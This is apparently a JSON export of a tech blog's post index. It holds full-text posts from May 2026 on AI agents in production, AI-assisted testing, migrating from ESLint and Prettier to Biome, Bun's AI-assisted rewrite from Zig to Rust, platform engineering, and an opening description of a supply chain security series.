Use AI for one category of tests. See what works. Iterate. Don\u0026rsquo;t try to automate all testing overnight.\nThe best test suites I\u0026rsquo;ve seen in 2026 are hybrid: hand-written core tests, AI-generated edge cases, and comprehensive property-based validation. It\u0026rsquo;s more work upfront, but it catches more bugs.\n","date":"29 May 2026","externalUrl":null,"permalink":"/posts/260529-ai-assisted-testing/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AI models can now generate tests, find edge cases, and validate behavior at scale. But blindly using AI for testing creates false confidence. Here’s how to use AI effectively while maintaining actual test quality.","title":"AI-Assisted Testing Best Practices: From Unit Tests to Behavior Validation","type":"posts"},{"content":"","date":"29 May 2026","externalUrl":null,"permalink":"/categories/development/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Development","type":"categories"},{"content":"","date":"29 May 2026","externalUrl":null,"permalink":"/tags/quality-assurance/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Quality Assurance","type":"tags"},{"content":"","date":"29 May 2026","externalUrl":null,"permalink":"/tags/testing/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Testing","type":"tags"},{"content":"For years, we\u0026rsquo;ve watched AI models get smarter. But here\u0026rsquo;s what\u0026rsquo;s actually happening right now: those models are breaking free from the chatbot box. They\u0026rsquo;re becoming agents — autonomous systems that reason, plan, and execute tasks without human intervention between steps. And that\u0026rsquo;s not just a research paper anymore. 
It\u0026rsquo;s shipping in production at the major cloud providers.\nLast month, AWS, Google Cloud, and Azure all released agentic frameworks and integrations. GitHub Copilot is spinning up autonomous agents for code generation. Every major LLM provider is now positioning \u0026ldquo;agent-ready\u0026rdquo; as a core feature. This isn\u0026rsquo;t hype. This is infrastructure that works.\nWhat Makes a System an Agent # Before we go further, let me be clear about what we\u0026rsquo;re talking about. An agent isn\u0026rsquo;t just an API call that returns an answer. It\u0026rsquo;s a system that can:\nObserve the current state of a problem Plan a sequence of steps to solve it Execute those steps by calling tools (APIs, databases, other services) Adapt when things don\u0026rsquo;t go as expected The critical difference from a traditional chatbot is the feedback loop. A chatbot answers one question and hands it off to a human. An agent looks at its own output, decides whether the task is complete, and if not, loops back to try a different approach. This mirrors the autonomous reasoning we\u0026rsquo;ve seen with extended thinking models and reasoning-focused architectures that can handle multi-step problem solving.\nI\u0026rsquo;ve been in this field long enough to know the difference between genuine capability and marketing speak. What I\u0026rsquo;m seeing now is genuine. The agents being deployed today can actually handle real workflows — code generation with testing, customer support with system access, data analysis with query loops. They fail gracefully. They know when to escalate. How development practices are evolving shows this shift from manual tooling to agent-assisted automation. Computer use capabilities in AI agents demonstrate how agents are learning to interact with systems directly.\nWhy This Matters Now # This timing isn\u0026rsquo;t random. Three things had to converge.\nFirst, model quality crossed a threshold. 
GPT-4 and Claude weren\u0026rsquo;t a breakthrough just because they\u0026rsquo;re smarter at answering questions. They were a breakthrough because they can actually plan multi-step tasks and recover from mistakes. That\u0026rsquo;s the foundation everything else sits on. These reasoning advances are accelerating this capability, enabling agents to be applied across real development workflows.\nSecond, the tooling finally got mature enough. Function calling used to be fragile. Now it\u0026rsquo;s reliable. Frameworks like LangChain, CrewAI, and the cloud-native equivalents now handle much of the hard work around context management, token budgeting, and error handling. GitHub Copilot agent mode represents a major milestone in developer-facing agentic tools.\nThird, organizations are desperate for this. The amount of time we waste on repetitive, multi-step work is genuinely stupid. A well-trained agent can execute half of what your operations team does in a day. That\u0026rsquo;s not speculation. That\u0026rsquo;s happening right now in companies I\u0026rsquo;ve worked with.\nThe Architecture Pattern Emerging # Here\u0026rsquo;s what I\u0026rsquo;m seeing across successful deployments:\nDefine the agent\u0026rsquo;s scope clearly. Not \u0026ldquo;solve any problem,\u0026rdquo; but \u0026ldquo;handle customer password resets with escalation rules\u0026rdquo; or \u0026ldquo;analyze logs and generate diagnostics.\u0026rdquo; Narrow domains work. General-purpose agents are still fantasy.\nBuild a robust tool layer. The quality of your APIs and database queries directly determines whether your agent succeeds or fails. If your tools are messy, your agent will be messy. Modern platform engineering patterns center on agent-ready architectures and autonomous system support.\nImplement guardrails. Cost limits, action validation, human approval gates for critical operations. Agents without guardrails will happily spend your entire budget or execute something dangerous. 
I\u0026rsquo;ve seen both happen. This is where cloud cost optimization and FinOps becomes essential for preventing runaway agent costs.\nMonitor the loops. Log every reasoning step, every tool call, every decision. When something goes wrong — and it will — you need visibility into exactly what the agent was thinking. Observability of complex systems has become far more practical. For teams building in regulated environments, comprehensive logging is a compliance requirement, not optional.\nThe Real Challenges # To be fair, this isn\u0026rsquo;t a solved problem yet. The challenges I\u0026rsquo;m seeing in production:\nConsistency is still hard. Agents will sometimes take wildly different approaches to the same problem on different runs. That\u0026rsquo;s fine for exploratory tasks. It\u0026rsquo;s a nightmare for compliance-heavy domains.\nCost can explode fast. Multiple reasoning loops with large context windows add up. We\u0026rsquo;re talking thousands of dollars per day if you\u0026rsquo;re not careful. The economics haven\u0026rsquo;t stabilized yet. Cloud FinOps strategies become critical when deploying agents at scale. Understanding cost management patterns is essential for sustainable agent deployments.\nHallucination is still real, even at the frontier. An agent might confidently try to call a function that doesn\u0026rsquo;t exist, or misinterpret the output of one that does. AI-assisted testing frameworks help validate agent behavior before production deployment.\nIntegration with legacy systems is its own circle of hell. Modern APIs make this easy. Everything else is a custom integration project.\nBut here\u0026rsquo;s the thing: these are engineering problems, not physics problems. We know how to solve them. Some of them are just expensive or slow. 
That\u0026rsquo;s where robust infrastructure and platform design come in — building the systems that allow agents to run reliably at scale.\nSub-Hub: Agent Systems Architecture Patterns # For deeper exploration of how to design and build reliable agent systems, see Agent Systems Architecture Patterns. This sub-hub covers reasoning loops, tooling integration, observability, cost management, and governance patterns that make agents work in production.\nMy Take # AI agents aren\u0026rsquo;t the future. They\u0026rsquo;re happening right now. The question for your organization isn\u0026rsquo;t whether agents are real — they are. The question is: which of your workflows are safe to hand over, and what are you going to build with the time you save?\nThe shift isn\u0026rsquo;t just technical. It\u0026rsquo;s architectural. We\u0026rsquo;re moving from request-response systems to autonomous decision-making systems. That means your APIs, your databases, and your monitoring all need to think in terms of \u0026ldquo;what happens when this runs without a human in the loop?\u0026rdquo;\nThe teams that figure this out first will have a meaningful competitive advantage. The next inflection point isn\u0026rsquo;t in the models. It\u0026rsquo;s in the infrastructure we build around them. Governance frameworks and compliance requirements around autonomous systems will shape how we build responsibly. 
Observability and monitoring for agent systems are essential from day one.\n","date":"26 May 2026","externalUrl":null,"permalink":"/posts/260526-rise-of-agent-based-systems/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AI agents are moving from research labs into production systems, fundamentally changing how we architect software for autonomous decision-making and execution.","title":"The Rise of Agent-Based Systems in Software Development — From Concept to Production","type":"posts"},{"content":"When I first benchmarked Biome against my team\u0026rsquo;s existing ESLint + Prettier setup, I thought the numbers were a measurement error. Forty seconds down to four hundred milliseconds. That\u0026rsquo;s not a performance improvement — that\u0026rsquo;s a shift of two orders of magnitude. And it\u0026rsquo;s making me rethink what we should accept from our developer tools in 2026.\nThe ESLint and Prettier Tax # Let\u0026rsquo;s be honest about what we\u0026rsquo;ve normalized. A typical modern JavaScript project runs linting and formatting on save, on commit, and in CI. Each pass takes 30–40 seconds on a medium-sized codebase. Multiply that across a team of ten people running linters 3–4 times per day, and you\u0026rsquo;re burning roughly 15 to 27 minutes of team time every day, or about 60 to 110 developer-hours per year (assuming around 250 working days), on waiting for tools to finish.\nThis isn\u0026rsquo;t new pain — it\u0026rsquo;s just old pain we\u0026rsquo;ve stopped questioning. ESLint and Prettier are foundational tools. They\u0026rsquo;re battle-tested, well-documented, and everywhere. But they were built in an era when \u0026ldquo;good enough\u0026rdquo; meant \u0026ldquo;finishes in 30 seconds.\u0026rdquo; The JavaScript ecosystem has momentum, and momentum is hard to redirect.\nEnter Biome # Biome is a single tool written in Rust that handles linting, formatting, and import sorting in one pass. No chaining. No dual configuration files. 
One command, one configuration object, one mental model.\nThe performance is aggressive. Biome processes the same codebase in 300–400 milliseconds. That\u0026rsquo;s not a marginal win — that\u0026rsquo;s the difference between \u0026ldquo;instant\u0026rdquo; and \u0026ldquo;perceptible.\u0026rdquo; Your linter feedback on save becomes synchronous with your editor keystroke. Formatting becomes something you don\u0026rsquo;t wait for.\nThe architecture is unified in a way that matters. ESLint and Prettier live in separate tools with overlapping concerns. You configure them separately, they parse the code separately, and they sometimes conflict with each other (which is why every ESLint + Prettier setup adds a compatibility layer). Biome eliminates that friction entirely. It lints and formats in one pass, with a single rule set.\nThe Real Problem: Not All Rules Migrate # Here\u0026rsquo;s where the honest take comes in: Biome is not a drop-in replacement. If you rely on specific ESLint plugins — like eslint-plugin-react, eslint-plugin-vue, or custom rule sets your team built — you won\u0026rsquo;t find exact equivalents in Biome. Biome ships with sensible defaults for JavaScript, TypeScript, JSX, and JSON, but it\u0026rsquo;s opinionated. It will not replicate every rule in every plugin ecosystem.\nThis is both a strength and a friction point. The strength: Biome\u0026rsquo;s rule set was designed by people who thought about what actually matters, rather than accumulated from fifteen years of third-party contributions. The friction: if your setup includes rules from three different plugins, migrating to Biome involves trade-offs.\nFor most teams, that trade-off is worth it. The rules you lose are rarely the ones you\u0026rsquo;d die for. The ones Biome provides are solid, well-reasoned, and often better than the alternatives. 
But for teams with heavily customized ESLint setups, this is a real migration cost.\nWhat This Signals About JavaScript Tooling # Biome didn\u0026rsquo;t invent the insight that JavaScript tooling had become bloated. The whole ecosystem has been moving in this direction: consolidation, rewrite in Rust, performance-first design. We\u0026rsquo;ve seen it with Esbuild (which replaced webpack/Parcel/Rollup in many workflows), with SWC (which replaced Babel), and with Turbopack (which aims to replace webpack entirely).\nThis mirrors what\u0026rsquo;s happening in the JavaScript runtime space itself, where Rust-based runtimes like Deno and Bun are reshaping the landscape. The Rust rewrite of Bun\u0026rsquo;s core demonstrates the same pattern: performance, memory safety, and developer experience become table stakes when you redesign from first principles. The same consolidation trend is visible in Python\u0026rsquo;s tooling evolution where consolidated tools are replacing fragmented ecosystems.\nThere\u0026rsquo;s a pattern here. The JavaScript ecosystem accumulated best practices, good intentions, and performance compromises. Then people wrote new tools in Rust, designed them from scratch to be fast, and discovered that velocity matters more than perfect compatibility with legacy plugins.\nBiome is the next domino. I expect that within 18 months, ESLint and Prettier will feel like Webpack felt in 2020 — technically still used, but no longer the default choice for new projects. When frameworks and runtimes like Deno 2.3 ship with Biome built-in, the shift accelerates.\nThe Migration Path Is Real, Not Hypothetical # I\u0026rsquo;ve migrated a 50,000-line JavaScript codebase to Biome. 
Here\u0026rsquo;s what that looked like:\nInstall Biome — npm install -D @biomejs/biome Initialize config — npx biome init (generates a sensible starting point) Adjust rules — your team\u0026rsquo;s linting philosophy probably overlaps with Biome\u0026rsquo;s defaults by 80–90% Migrate CI — replace your lint and format scripts Remove old tools — npm uninstall eslint prettier eslint-config-* (and you\u0026rsquo;ll see your node_modules shrink) The first pass usually surfaces a few rules you want to disable or adjust. That takes an hour or two. The formatting changes are automatic. You run biome check --write once, commit the diff, and move forward.\nThe real migration cost isn\u0026rsquo;t technical — it\u0026rsquo;s social. Your team\u0026rsquo;s linting philosophy might have opinions that Biome doesn\u0026rsquo;t share. That\u0026rsquo;s a conversation to have, not a blocker.\nMy Take # I think Biome is the right call for new projects starting today, and a worthwhile migration for existing codebases. The performance difference alone justifies it — synchronous linter feedback on save is not a luxury, it\u0026rsquo;s table stakes. But the real win is simplicity: one tool, one configuration, one rule set, one community.\nESLint and Prettier served us well. They solved real problems in a world where JavaScript performance meant \u0026ldquo;finished within 30 seconds.\u0026rdquo; But Biome points to where the ecosystem is going: fast, opinionated, and unified. The JavaScript ecosystem has a habit of consolidating around tools that get the fundamentals right. 
Biome got them right.\nThe next question isn\u0026rsquo;t \u0026ldquo;should I migrate to Biome?\u0026rdquo; It\u0026rsquo;s \u0026ldquo;what else am I running as two separate tools that should be one?\u0026rdquo; This consolidation pattern is becoming the norm across the developer experience, from AI-assisted testing frameworks that integrate multiple concerns into unified workflows to build tools that combine multiple phases into single passes.\n","date":"21 May 2026","externalUrl":null,"permalink":"/posts/260521-biome-eslint-prettier-killer/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Biome replaces ESLint, Prettier, and half your build pipeline with a single Rust-based tool 100x faster — and it’s already becoming the default choice.","title":"Biome — The ESLint and Prettier Killer","type":"posts"},{"content":" Overview # A developer\u0026rsquo;s productivity and code quality are fundamentally shaped by the tools they use. This series tracks the evolution of development tooling—from IDEs and code editors to build systems, testing frameworks, and CI/CD platforms. 
We also cover the rapidly evolving landscape of AI coding assistants, observability tools, and how automation is reshaping what development means.\nThe right tools amplify developer capability; the wrong tools create friction and hide problems.\nWhat You\u0026rsquo;ll Find Here # IDE \u0026amp; Editor Evolution: How VS Code, JetBrains IDEs, and emerging editors continue to innovate—extensions, language support, and the rise of AI-powered code completion.\nBuild System \u0026amp; Package Management: Modern build tools like Turbopack, Rspack, and package managers addressing speed, resolution, and reproducibility.\nTesting Infrastructure: Test runners, coverage tools, mocking frameworks, and how continuous testing integrates into the development loop.\nCI/CD Platforms: GitHub Actions, GitLab CI, cloud-native CI/CD, and how automation reshapes deployment practices.\nAI Coding Assistants: GitHub Copilot, Claude, ChatGPT, and how AI changes code writing, debugging, and pair programming dynamics.\nObservability \u0026amp; Debugging: Better debugging tools, profilers, monitoring, and how developers understand system behavior in production.\nLearning Path # Understand modern development workflow — how IDEs, VCS, and automation fit together Evaluate build tooling — what matters in build performance, reproducibility, and monorepo support Build effective testing practices — types of tests, coverage strategies, and continuous testing pipelines Master CI/CD automation — from basic build/test/deploy to sophisticated multi-environment deployments Adopt AI tools effectively — understanding where AI coding assistants amplify productivity and where they introduce risk Key Technologies Covered # Editors/IDEs: VS Code, JetBrains IDEs, Neovim, and specialized editors Build Systems: Turbopack, Rspack, esbuild, Vite, Webpack, Gradle, Cargo Package Managers: npm, yarn, pnpm, Cargo, pip, and language-specific alternatives Testing: Vitest, Jest, Playwright, Cypress, Go testing, and polyglot 
test frameworks CI/CD: GitHub Actions, GitLab CI, CircleCI, Cloud Build, and container-native approaches AI Assistants: GitHub Copilot, Anthropic Claude, and emerging coding models Observability: Debugging tools, profilers, APM platforms, and structured logging Related Series # Explore complementary areas: JavaScript \u0026amp; Node.js (tooling specific to the JavaScript ecosystem), AI Models \u0026amp; Releases (foundation models powering coding assistants)\n","date":"21 May 2026","externalUrl":null,"permalink":"/series/developer-tooling/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Developer Tooling","type":"series"},{"content":"","date":"21 May 2026","externalUrl":null,"permalink":"/tags/javascript/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"JavaScript","type":"tags"},{"content":"","date":"21 May 2026","externalUrl":null,"permalink":"/tags/open-source/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Open Source","type":"tags"},{"content":"","date":"21 May 2026","externalUrl":null,"permalink":"/tags/typescript/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"TypeScript","type":"tags"},{"content":"On May 14, 2026, Jarred Sumner merged PR #30412 into Bun\u0026rsquo;s main branch. The title is straightforward: \u0026ldquo;Rewrite Bun in Rust.\u0026rdquo; The diff is not — 1,009,257 lines added, 4,024 deleted, 2,188 files changed across 6,755 commits. 
In roughly one week, the Bun runtime went from being one of the most prominent Zig codebases in production to a Rust project.\nThis is one of those moments that reshapes the conversation around JavaScript runtimes, language choice, and — whether you like it or not — AI-assisted development at scale.\nThe Background # Bun launched in 2022 as an all-in-one JavaScript runtime, bundler, package manager, and test runner. Its big differentiator was performance, and its implementation language was Zig — a systems language designed as a pragmatic alternative to C and C++. Zig gave Bun low-level control without the complexity of Rust\u0026rsquo;s borrow checker, and it was a deliberate choice by Jarred Sumner at the time.\nThis rewrite is the latest chapter in the JavaScript runtime wars, where Deno, Node.js, and Bun are constantly innovating to stay competitive. Understanding the broader landscape helps explain why a team would undertake such a massive technical overhaul. Similar language and architecture decisions are unfolding across the tech stack, from Python\u0026rsquo;s free-threading initiatives to Go ecosystem evolution, where performance and memory safety drive strategic rewrites.\nBut Zig also meant manual memory management. No compiler enforcing lifetimes. No borrow checker catching use-after-free bugs at compile time. For a small, fast-moving team building a runtime that handles untrusted user code, that trade-off became increasingly painful. 
This follows the same reasoning we\u0026rsquo;ve seen with Rust adoption in the Linux kernel — memory safety is worth the complexity cost when security matters.\nAs Jarred put it in the PR description:\n\u0026ldquo;Most importantly, we now have compiler-assisted tools for catching \u0026amp; preventing memory bugs, which have costed the team an enormous amount of development \u0026amp; debugging time over the years.\u0026rdquo;\nThat\u0026rsquo;s the kind of sentence that only comes after years of late-night debugging sessions.\nWhat Actually Changed # This was a faithful port, not an architectural overhaul. The Rust version keeps the same architecture, the same data structures, and the same approach to minimizing third-party dependencies. Notably, there\u0026rsquo;s no async Rust — Bun continues to use its own event loop and concurrency model rather than adopting Tokio or similar frameworks.\nThe preparation was methodical. Before the actual rewrite began, the team committed a detailed Zig-to-Rust porting guide that maps Zig idioms to their Rust equivalents. Internal smart pointer types were pre-mapped to Rust counterparts. A bun_collections Rust crate was already in place. This wasn\u0026rsquo;t a spontaneous decision — the groundwork was laid carefully.\nThe concrete results:\nBinary size shrinks by 3–8 MB depending on platform Benchmarks are \u0026ldquo;between neutral and faster\u0026rdquo; according to the PR The rewrite fixes several existing memory leaks and flaky tests 99.8% test suite compatibility on Linux x64 glibc before merge The AI in the Room # Let\u0026rsquo;s talk about the branch name: claude/phase-a-port. That\u0026rsquo;s not subtle. Claude, Anthropic\u0026rsquo;s AI model, was heavily involved in the actual code translation. Given that Bun is now part of Anthropic\u0026rsquo;s portfolio, this is as much a showcase of AI-assisted development as it is a runtime upgrade.\nThe timeline makes this clear. 
Jarred first floated the idea publicly around May 5, describing it as experimental:\n\u0026ldquo;I\u0026rsquo;m curious to see what a working version looks like, what it feels like, how it performs and if/how hard it\u0026rsquo;d be to get it to pass Bun\u0026rsquo;s test suite and be maintainable.\u0026rdquo;\nHe also added:\n\u0026ldquo;There\u0026rsquo;s a very high chance all this code gets thrown out completely.\u0026rdquo;\nOne week later, it was merged. A million lines of Rust, passing 99.8% of the test suite on Linux x64 glibc.\nWhether you\u0026rsquo;re impressed or skeptical, this is worth paying attention to. Translating a codebase 1:1 between two systems languages — with detailed porting guides as context — is arguably the sweet spot for current LLM capabilities. It\u0026rsquo;s repetitive, pattern-heavy work where the source and target languages have similar levels of abstraction. It\u0026rsquo;s very different from asking an AI to design an architecture from scratch. This echoes what we\u0026rsquo;ve seen with Claude\u0026rsquo;s in-context learning capabilities — when the task is pattern-matching with clear context, modern AI can execute at scale. The same principles apply to AI-assisted testing and code quality, where AI works best on well-structured, pattern-heavy tasks with clear requirements.\nCommunity Reaction: Polarized # The GitHub PR tells its own story through the reaction counts: 1,254 thumbs up and 1,010 thumbs down. That\u0026rsquo;s an unusually polarized ratio for a merged PR from a project\u0026rsquo;s creator.\nOn Hacker News, the discussion was massive. The merge announcement pulled in 652 points and 724 comments. An earlier thread about the Zig-to-Rust porting guide hit 722 points with 554 comments. 
The 99.8% test compatibility announcement got 716 points and 692 comments.\nThe skepticism falls into a few camps:\n\u0026ldquo;One week is misleading.\u0026rdquo; Several commenters pointed out the extensive preparation — the porting guide, the pre-mapped types, the bun_collections crate. As one Hacker News user put it: \u0026ldquo;When announcements say that rewrite took 1 week, I wonder how much time went into preparing this file with very detailed instructions on mapping Zig to Rust idioms.\u0026rdquo;\n\u0026ldquo;This is marketing for Anthropic.\u0026rdquo; With Bun now under Anthropic\u0026rsquo;s umbrella, the rewrite doubles as a proof-of-concept for Claude\u0026rsquo;s coding capabilities. Some community members questioned whether the narrative was being shaped to serve that purpose.\n\u0026ldquo;AI-generated code at this scale is concerning.\u0026rdquo; A million lines of AI-translated Rust is a lot of code that no human has read line by line. The test suite passes, but test suites don\u0026rsquo;t catch everything — especially subtle concurrency bugs or edge cases in memory management that might only surface under specific workloads. Agent-based systems for code verification might eventually help catch these edge cases, but we\u0026rsquo;re not there yet.\nOn the other side, plenty of developers see this as pragmatic. Memory safety matters. Rust\u0026rsquo;s ecosystem is mature. And if AI can handle the mechanical translation while humans focus on architecture and correctness, that\u0026rsquo;s arguably a better use of everyone\u0026rsquo;s time.\nWhat This Means for the Runtime Landscape # The JavaScript runtime space now has an interesting dynamic:\nNode.js: C++ core, the incumbent, massive ecosystem Deno: Rust core (from the start), TypeScript-first, security-focused Bun: Now Rust core (migrated from Zig), performance-focused, all-in-one Two out of three major runtimes are now built on Rust. 
That\u0026rsquo;s a strong signal about where the industry is landing on the systems programming language question for this class of software. It also means Bun and Deno now share an implementation language, which could eventually lead to shared libraries or tooling.\nIf you\u0026rsquo;re interested in the broader context of where these runtimes are heading, I\u0026rsquo;ve explored the JavaScript runtime landscape in depth, and the shifts in Deno 2.3 and the runtime wars provide important context for understanding why memory safety and performance matter so much to the ecosystem right now.\nFor existing Bun users, the migration should be transparent. The rewrite is available via bun upgrade --canary, and the team has been clear that it won\u0026rsquo;t ship as a stable release until the remaining optimization and cleanup work is done. If you\u0026rsquo;re interested in the practical implications for local development, Docker\u0026rsquo;s Model Runner integration now works with Bun as your runtime, which opens up interesting possibilities for local AI development.\nMy Take # I think the Rust rewrite is the right call for Bun\u0026rsquo;s long-term health. Memory safety bugs in a JavaScript runtime aren\u0026rsquo;t just developer inconveniences — they\u0026rsquo;re potential security vulnerabilities that affect everyone running Bun in production. The borrow checker catches entire categories of bugs that manual auditing misses.\nThe AI angle is the more interesting conversation. One week to port a million lines is genuinely remarkable, but let\u0026rsquo;s be honest about what \u0026ldquo;port\u0026rdquo; means here. This was a mechanical translation with detailed instructions, not a creative engineering effort. The hard work — the architecture, the algorithms, the test suite — was already done. That doesn\u0026rsquo;t diminish the achievement, but it does scope it accurately.\nWhat I\u0026rsquo;m watching for: how the Rust version evolves after the initial port. 
The real test isn\u0026rsquo;t whether AI can translate Zig to Rust. It\u0026rsquo;s whether the resulting Rust codebase is idiomatic enough that human developers can maintain and extend it without fighting the code. A faithful port preserves behavior, but it doesn\u0026rsquo;t always preserve readability.\nThe 1,010 thumbs-down reactions on the PR are worth taking seriously too. When roughly half the community pushes back on a technical decision, it usually means something beyond \u0026ldquo;I don\u0026rsquo;t like Rust.\u0026rdquo; In this case, I think it reflects a broader anxiety about the pace of AI-driven changes in open-source projects and about Anthropic\u0026rsquo;s influence on a tool many developers depend on.\nEither way, the JavaScript runtime wars just got more interesting. Bun ships with memory safety guarantees now, and the bar for every runtime in the space just went up.\n","date":"15 May 2026","externalUrl":null,"permalink":"/posts/260515-bun-rust-rewrite/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Bun just merged a massive PR rewriting its core from Zig to Rust — over a million lines changed in roughly a week. 
Here’s what happened, why it matters, and what the community thinks about an AI-assisted rewrite of an entire JavaScript runtime.","title":"Bun Rewrites Its Core in Rust — What It Means for the JavaScript Runtime Wars","type":"posts"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/developer-tooling/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Developer Tooling","type":"tags"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/devops/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"DevOps","type":"tags"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/series/javascript--node.js/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"JavaScript \u0026 Node.js","type":"series"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/categories/open-source/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Open Source","type":"categories"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/platform-engineering/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Platform Engineering","type":"tags"},{"content":"Platform engineering has matured from a buzzword to a discipline, and the best teams are treating their platforms as products. The shift from \u0026ldquo;give developers raw infrastructure access\u0026rdquo; to \u0026ldquo;provide curated, opinionated abstractions\u0026rdquo; has transformed how organizations scale.\nThe Product Mindset # Platform engineering in 2025 represents a shift in thinking. Instead of building platforms as side projects, successful teams treat them as products with their own roadmaps, user research, and iteration cycles. 
Developers are customers, and the job is to serve them.\nThis means understanding what developers actually need to do their jobs. Golden paths that embed best practices save developers from making poor decisions. Documentation that\u0026rsquo;s usable, not just comprehensive, matters enormously. And feedback loops — understanding how developers use your platform and where they struggle — are essential.\nInternal Developer Platforms and Abstractions # The rise of Backstage and similar developer portals provides a front door to your platform. But the real work happens in the layers beneath: how you abstract infrastructure, how you enforce policy, and how you provide self-service capabilities.\nKubernetes often forms the foundation for these platforms, but developers shouldn\u0026rsquo;t need to understand Kubernetes. They should declare what they need, and the platform provides it. This requires building abstractions that are opinionated enough to be useful but flexible enough to handle the exceptions.\nInfrastructure as Code and Declarative Approaches # Managing infrastructure declaratively — treating it like code — is table stakes. OpenTofu provides a solid foundation for teams starting from scratch or migrating away from Terraform\u0026rsquo;s licensing constraints. The community fork has demonstrated its ability to innovate independently.\nFor teams already deep in Kubernetes, OpenTofu\u0026rsquo;s maturity provides good alternatives to proprietary tools. The key is consistency: pick an approach, standardize on it, and version-control your infrastructure like you do your application code.\nObservability as a Platform Concern # You can\u0026rsquo;t manage what you can\u0026rsquo;t observe. OpenTelemetry\u0026rsquo;s maturity means you have standard patterns for logging, metrics, and tracing. 
Your platform should provide these capabilities by default, not as an afterthought.\nThis means instrumenting your platform itself — giving operators visibility into platform health, developer workflows, and infrastructure efficiency. Cost monitoring and FinOps become possible with good observability.\nMoving Beyond Manual Operations # Platform engineering practices are increasingly incorporating AI-assisted operations. Rather than having platform engineers manually respond to issues, tools are beginning to handle routine tasks with human oversight.\nAI-assisted testing validates infrastructure changes before they reach production. In-context learning approaches let platforms document themselves in ways that AI systems can reason over. The platform itself becomes more autonomous.\nSupporting Modern Workloads # Modern platforms need to support diverse workloads: containerized services, serverless functions, batch jobs, and increasingly, AI/ML inference. Kubernetes handles most of these well, but the platform layer needs to expose them through consistent abstractions.\nThis means thinking about how developers declare infrastructure needs regardless of underlying implementation. A database? The platform provisions it. A job queue? Same pattern. This consistency is what makes platforms truly valuable.\nSecurity and Compliance by Default # Good platforms enforce security and compliance policies by default rather than relying on developers to think about them. Policy-as-code approaches baked into your platform ensure that standards are followed without manual review in every case.\nThis is especially important as organizations increasingly need to comply with regulations like the EU AI Act. The platform can enforce documentation, testing, and monitoring requirements transparently.\nAI Integration and Agent-Readiness # As agent-based systems become more common, platforms need to be designed with autonomous decision-making in mind. 
This means clear APIs, good error messages, and the ability for agents to understand what actions are available and their consequences.\nGitHub Copilot\u0026rsquo;s agent mode shows what this looks like in developer tools. Platforms should aspire to be similarly agent-ready.\nCost Optimization and Efficiency # Platforms have enormous leverage over organizational infrastructure costs. Cloud cost optimization isn\u0026rsquo;t just about picking cheap resources — it\u0026rsquo;s about helping developers make good decisions about what resources they actually need.\nProviding visibility into costs, encouraging right-sizing, and automating scaling decisions all compound to significant savings. And as infrastructure costs continue to grow, this expertise becomes increasingly valuable.\nBuilding vs. Buying vs. Composing # The era of \u0026ldquo;build everything\u0026rdquo; has ended. The best platforms are composed from open-source projects (Kubernetes, OpenTofu, Cilium, ArgoCD) with internal tooling to integrate them and provide the abstractions your organization needs.\nThis approach — composition over construction — lets you focus on what\u0026rsquo;s unique to your organization rather than reinventing infrastructure components.\nMy Take # Platform engineering is table stakes for organizations at scale. The question isn\u0026rsquo;t whether to do it, but how well you do it. The teams that succeed are treating their platforms as products, investing in developer experience, and building observability and automation from the start.\nThe shift toward AI-assisted operations will accelerate. Platforms that are well-instrumented and well-designed for automation will compound their advantages. Those that are ad hoc collections of scripts will find themselves increasingly behind.\nThe next inflection point is probably agent-ready platforms — infrastructure that developers can declare through natural language, reviewed by autonomous systems, and deployed with human oversight. 
That\u0026rsquo;s not far away.\n","date":"15 May 2026","externalUrl":null,"permalink":"/posts/260515-platform-engineering-devops-practices/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Platform engineering moves from infrastructure operations to building delightful developer experience. Learn the patterns that work.","title":"Platform Engineering \u0026 DevOps Practices — Building Developer Experience Platforms","type":"posts"},{"content":"","date":"15 May 2026","externalUrl":null,"permalink":"/tags/rust/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Rust","type":"tags"},{"content":"","date":"12 May 2026","externalUrl":null,"permalink":"/tags/node.js/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Node.js","type":"tags"},{"content":" Overview # Modern software depends on hundreds of dependencies. Each one is a potential attack vector into your application. This series covers software supply chain security—from understanding dependency vulnerabilities and malicious packages to securing your build pipeline, implementing signing and verification, and building resilient dependency management practices.\nSupply chain attacks are increasing in sophistication, but a solid foundation in understanding the risks and adopting security practices can dramatically reduce exposure.\nWhat You\u0026rsquo;ll Find Here # Dependency Vulnerabilities: How to find, understand, and prioritize vulnerabilities in your dependencies. 
